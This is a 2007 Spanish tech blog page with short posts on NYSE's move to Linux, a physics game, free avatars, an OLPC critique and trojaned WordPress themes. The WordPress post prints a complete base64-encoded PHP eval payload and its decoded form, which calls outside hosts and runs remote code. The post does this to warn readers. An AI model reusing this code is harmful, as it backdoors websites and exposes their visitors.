NYSE prepara migración a Linux.

El día de ayer (14 de diciembre), apareción publicado en el New York Times, una noticia sorprendente, NYSE (New York Stock Exchange), la bolsa de valores más grande del mundo, que además controla Euronex (la bolsa Europea más grande), esta planeando migrar a Linux usando servidores x86. Esto ha sido lo que ha declarado Steve Rubinow, quien es CIO (Chief Information Office) de NYSE.

Steve Rubinow dice textualmente: "Nosotros estamos tratando de ser independientes de cualquier teconología, tanto cómo sea posible", además de resaltar que "Linux esta lo suficientemente pulido para nosotros".

La NYSE ha instalado cerca de 200 servidores HP ProLiant DL585 de cuatro procesadores y 400 ProLiant BL685c (servidores de tipo blade), de dos procesadores de doble núcleo Opteron de AMD; todos ellos corriendo Linux. Adicionalmente NYSE esta usando servidores HP Integrity NonStop, los cuales estan basados en el chip de Intel Itanium y corren un sistema tolerante a fallos llamado NonStop OS, de la misma forma que el software de administración de red OpenView.

A no dudar, esta noticia debe de poner más presión sobre las dos principales desplazados, Sun Microsystem y Microsoft.

Publicado el 15 diciembre, 2007 por volkan68 0

Crayon Physics

Quién dice que enseñar física tiene que ser aburrido, este juego "Crayon Physics", que es gratuito y puede ser descargado desde la página web de su creador en Kloonigames, es a la vez educativo y entretenido.

El juego consiste en mover una bola roja dibujando objetos que reaccionan a las leyes físicas, para que toque una estrella que se muestra en la pantalla. Con el botón izquierdo del mouse se dibujan los objetos y con el derecho se borran. La tecla de "espacio" reinicia el nivel, y la tecla "Esc" invoca el menu. Para tener pantalla completa la combinación de teclas es Alt+Enter, y para cerrar la ventana Alt+F4.

Si quieren saber de qué se trata este juego que me ha llamado la atención aquí les dejo un video de YouTube:

Publicado el 13 diciembre, 2007 por volkan68 0

613 avatares listos para descargar

Desde esta página web http://www.internetvibes.net/ se pueden descargar 613 avatares de 100×100 pixels en formato png, de forma gratuita, listos para ser usados en MSN o foros.

Aquí algunos ejemplos de los avatares disponibles:

Publicado el 13 diciembre, 2007 por volkan68 0

Troyanos en themes de WordPress

Se ha reportado en varios websites relacionados a seguridad, que han aparecido themes de WordPress con código malicioso en ellos, por lo general estos themes se distribuyen de forma gratuita en websites que ofrecen servicios de descargas de themes. Uno de estos lugares es wpsphere.com, que distribuye themes de terceros, alguno de los cuales contienen código malicioso que permiten a un atacante externo inyectar código javascript en los blogs que usen esos themes.

El primero en dar la voz de alarma fue Paul Carroll en su blog. El encontro el siguiente código malicioso dentro del archivo header.php un theme de wpsphere.com:

@eval(@base64_decode('aWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQkMzMD kxNiA9IEBmc29 ja29wZW4oInd3dy53cHNzci5jb20iLCA4MCwgJFIzMkQwMDA3MEQ0R kZCQ0NFMkZDNjY5QkJBODEyRDRDMiwgJFI1RjUyNUY1QjM5OERBREQ3Q0YwNzg0QkQ0M DYyOThFMywgMykpICRSNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid 3Bzc3IiOyBlbHNlaWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQkMzMDkxNiA9I EBmc29ja29wZW4oInd3dy53cHNuYy5jb20iLCA4MCwgJFIzMkQwMDA3MEQ0RkZCQ0NFM kZDNjY5QkJBODEyRDRDMiwgJFI1RjUyNUY1QjM5OERBREQ3Q0YwNzg0QkQ0MDYyOThFM ywgMykpICRSNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3BzbmMiO yBlbHNlICRSNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3BzbmMyI jsgQGV2YWwoJyRSMTRBRjFCRTlFRTI2QTkwOTIxRTY0QTgyRTc4MzY3OTcgPSAxOycpO yBpZigkUjE0QUYxQkU5RUUyNkE5MDkyMUU2NEE4MkU3ODM2Nzk3IEFORCBpbmlfZ2V0K CdhbGxvd191cmxfZm9wZW4nKSkgeyAgJFJEM0ZFOUMxMEE4MDhBNTRFQTJBM0RCRDlFN jA1QjY5NiA9ICIxIjsgICRSNkU0RjE0QjMzNTI0M0JFNjU2QzY1RTNFRDlFMUIxMTUgP SAiaHR0cDovL3d3dy4kUjUwRjVGOUM4MEYxMkZGQUU4QjI0MDA1MjhFODFCMzRFLmNvb S93JFJEM0ZFOUMxMEE4MDhBNTRFQTJBM0RCRDlFNjA1QjY5Ni5waHA/dXJsPSIuIHVyb GVuY29kZSgkX1NFUlZFUlsnUkVRVUVTVF9VUkknXSkgLiImIi4gImhvc3Q9Ii4gdXJsZ W5jb2RlKCRfU0VSVkVSWydIVFRQX0hPU1QnXSk7ICAkUjNFMzNFMDE3Q0Q3NkI5QjdFN kM3MzY0RkI5MUUyRTkwID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCRSNkU0RjE0QjMzNTI0M 0JFNjU2QzY1RTNFRDlFMUIxMTUpOyAgQGV2YWwoJFIzRTMzRTAxN0NENzZCOUI3RTZDN zM2NEZCOTFFMkU5MCk7IH0gZWxzZSB7ICAkUkQzRkU5QzEwQTgwOEE1NEVBMkEzREJEO UU2MDVCNjk2ID0gIjAiOyAgJFI2RTRGMTRCMzM1MjQzQkU2NTZDNjVFM0VEOUUxQjExN SA9ICJodHRwOi8vd3d3LiRSNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUuY 29tL3ckUkQzRkU5QzEwQTgwOEE1NEVBMkEzREJEOUU2MDVCNjk2LnBocD91cmw9Ii4gd XJsZW5jb2RlKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddKSAuIiYiLiAiaG9zdD0iLiB1c mxlbmNvZGUoJF9TRVJWRVJbJ0hUVFBfSE9TVCddKTsgIEByZWFkZmlsZSgkUjZFNEYxN EIzMzUyNDNCRTY1NkM2NUUzRUQ5RTFCMTE1KTsgfSBmY2xvc2UoJFIzN0MwMTREQUU1R kU0RkU1Qzc3QjY3MzVBQkMzMDkxNik7'));

Éste código no es más que un script que inyecta código javascript en la cabecera de la página web, desde los websites www.wpssr.com y www.wpsnc.com, cómo se puede determinar eso, pues simplemente haciendo la decodificación MIME del código anterior, con lo que obtenemos éste código:

if($R37C014DAE5FE4FE5C77B6735ABC30916 = @fsockopen("www.wpssr.com" , 80, $R32D00070D4FFBCCE2FC669BBA812D4C2, $R5F525F5B398DADD7CF0784BD406298E3, 3)) { $R50F5F9C80F12FFAE8B2400528E81B34E = "wpssr"; } elseif($R37C014DAE5FE4FE5C77B6735ABC30916 = @fsockopen("www.wpsnc.com" , 80, $R32D00070D4FFBCCE2FC669BBA812D4C2, $R5F525F5B398DADD7CF0784BD406298E3, 3)) { $R50F5F9C80F12FFAE8B2400528E81B34E = "wpsnc"; } else { $R50F5F9C80F12FFAE8B2400528E81B34E = "wpsnc2"; } @eval($R14AF1BE9EE26A90921E64A82E7836797 = 1); if($R14AF1BE9EE26A90921E64A82E7836797 AND ini_get('allow_url_fopen')) { @eval($RD3FE9C10A808A54EA2A3DBD9E605B696 = "1"); $R6E4F14B335243BE656C65E3ED9E1B115 = "http://www.$R50F5F9C80F12FFAE8B2400528E81B34E.com /w$RD3FE9C10A808A54EA2A3DBD9E605B696.php?url=". urlencode($_SERVER['REQUEST_URI']) ."&". "host=". urlencode($_SERVER['HTTP_HOST']); $R3E33E017CD76B9B7E6C7364FB91E2E90 = @file_get_contents($R6E4F14B335243BE656C65E3ED9E1B115); } else { @eval($RD3FE9C10A808A54EA2A3DBD9E605B696 = "0"); $R6E4F14B335243BE656C65E3ED9E1B115 = "http://www.$R50F5F9C80F12FFAE8B2400528E81B34E.com /w$RD3FE9C10A808A54EA2A3DBD9E605B696.php?url=". urlencode($_SERVER['REQUEST_URI']) ."&". "host=". urlencode($_SERVER['HTTP_HOST']); readfile($R6E4F14B335243BE656C65E3ED9E1B115); } fclose($R37C014DAE5FE4FE5C77B6735ABC30916);
El truco usado es usar la función "eval" de PHP para ejecutar código PHP dentro de un array, y un array codificado en MIME para ocultar el código maligno.

Es por ello que se recomienda, no bajar desde sitios web de terceros themes o plugins, sino usar el website del autor directamente, o en su defecto auditar el código antes de usarlo en nuestro blog o CMS, ya que incluso esta forma de ataque es reproducible en CMS cómo Joomla, Mambo o Drupal. Finalmente, mejor que descargar un theme de otro es hacerlo uno mismo, de esta forma se tiene total control del código.

Publicado el 12 diciembre, 2007 por volkan68 0

Las OLPC y el riesgo que encierran.

Quisiera exponer algunos puntos que debemos tener en cuenta respecto al software que traerán las 260,000 laptops que ha adquirido el gobierno y que serán repartidas entre los escolares de menores recursos y zonas de frontera.

Para que mis opiniones puedan ser entendidas sería bueno que le de un vistazo al GUI (Graphical User Interface) que traerán estas Laptops, que se llama Sugar.

Si Ud. es un fanático de Linux y el OpenSource, pues no tendrá problema en hacer correr el Sugar en cualquiera de las más populares distribuciones Linux cómo: Fedora, Ubuntu o Debian, sin embargo ese no es el caso de la mayoría, que merece observar de primera mano qué es lo que se va ha comprar con dinero de todos nosotros. Para los que usan Windows, he escrito este tutorial: "Probando el software del OLPC desde Windows XP".

Si ya lo ha probado, pues Ud. se habrá dado cuenta de ciertas cosas:

La interface es completamente diferente a todas la otras que haya visto, no se parece en nada ni a Windows, OS X, KDE, Gnome o cualquier otro GUI que haya visto antes. El simple hecho de cerrar una aplicación es toda una aventura de descubrimiento . La idea es que esto debe ser sencillo para un niño, incluso si no sabe leer ni escribir. Aunque debe ser un pedagogo experto en educación de las tecnologías de la información, quien dé un juicio de valor sobre Sugar, por lo pronto lo único que puedo decir es que es un nuevo paradigma de GUI.
Las aplicaciones disponibles (llamadas actividades), no son muchas. Hay lo básico, siendo la herramienta principal para interactuar con Internet, el navegador web Firefox. Pero nuevamente adaptado, no hay barra de menú. Además no hay un panel de control desde donde poder administrar la laptop. Por ejemplo, no pude encontrar donde configurar una impresora.
La OLPC añade hardware diseñado ad-hoc, por lo tanto no puede ser emulada al 100% desde una PC, pero de lo que puede ser emulado, se deduce una tremenda diferencia entre lo que se pensó que debía de ser el OLPC y lo que realmente es el OLPC. Primeramente debemos entender cuál es la idea de la OLPC, esta laptop está pensada para reemplazar al profesor (no para complementarlo). Negroponte se dio cuenta que los países pobres no saldrían de su atraso, si es que no educaban rápidamente a las nuevas generaciones para que estas se integraran a la revolución digital. Seguir el módelo japonés de mediados del siglo XIX de enviar a los jóvenes más brillantes ha educarse a los países desarrollados, para que luego estos volvieran a enseñar en casa lo aprendido, no parecía realista (la mayoría no volvería). Y capacitar a los profesores en las nuevas tecnologías, para que estos enseñaran a los niños, también parecía un camino largo y de resultados inciertos. Es por ello que se pensó en proveer directamente a cada niño con un computador, que fuera lo suficientemente inteligente para que pueda enseñarles las bases de las nuevas tecnologías de la información, además de los conocimientos básicos de lenguaje (inglés), matemática y ciencias básicas. La idea fuerza detrás del proyecto era: es más fácil, rápido y barato producir una máquina, que entrenar a millones de profesores. Sin embargo el OLPC está a años luz de dicho objetivo.
No hay un filtro de contenidos, es posible ir a sitios porno o casinos usando el navegador. Así que las OLPC pueden no ser la herramienta que transforme la educación, sino por el contrario el anzuelo que lleve a nuestras nuevas generaciones a un mundo de consumismo digital.

Yo en principio creo que es posible transformar la educación reemplazando a los profesores por máquinas, realmente la gran mayoría de los profesores que tenemos en el Perú son fruto de un sistema educativo quebrado (no es culpa de ellos), por lo tanto lo único que harán será preservar ese modelo (ya lo dice el viejo refrán: "No se le pueden enseñar palabras nuevas a un loro viejo"). El actual sistema educativo no produce gente con mentalidad de superación, que no le teman a la competencia, rápidos para aprender, adaptables, dispuestos al trabajo duro y continuo para conseguir objetivos concretos, que sepan priorizar el uso de los recursos existentes, que tenga iniciativa y sobre todo bilingües (inglés + español), para que puedan entrar al mercado global a competir de igual a igual con otras personas de diversas partes del mundo. Pero si no tenemos un sistema de evaluación único y estándar, que nos permita identificar a los mejores, para concentrarlos en escuelas especiales, donde serán reforzados por los mejores profesores que tengamos, para que luego ellos sean la semilla de la siguiente generación, no iremos muy lejos.

Lamentablemente tenemos que reconocer que no todos somos iguales. Así como no todos podemos estar en la selección nacional de fútbol, pues no contamos con las habilidades del caso, no es lógico pensar que con dar la misma educación a todos, todos tendrán exactamente el mismo nivel, si eso fuera cierto, entonces tomemos a los gerentes por sorteo, o a los médicos por sorteo, a los ingenieros por sorteo, en lugar de hacerlos a través de un examen de selección.

La mejor forma de mejorar las cosechas o animales de crianza es el llamado mejoramiento genético, que no es otra cosa más que tomar a los mejores individuos y usarlos como base para la siguiente generación. De esa forma cada nueva generación recibe la herencia de sólo los mejores, luego se vuele a aplicar otra selección sobre esta nueva generación y es la base de la siguiente. Exactamente esa misma idea es la que se debe aplicar a la educación, sólo debe permitirse que los mejores sean los que enseñen, lamentablemente el puesto de profesor, especialmente el del estado, se ha convertido en el refugio de aquellos que no consiguen trabajo (precisamente los menos adaptable). Y ojo, esto no sólo es para los niveles inicial, primario y secundario; también en la educación superior se ve esto.

En resumen lo que trato de decir es que sólo aplicar mal la tecnología, es cómo aplicar mal el liberalismo económico. Los problemas seguirán allí.

Publicado el 10 diciembre, 2007 por volkan68 1

Tecnología y Negocios

Internet y negocios con tecnologías de la información.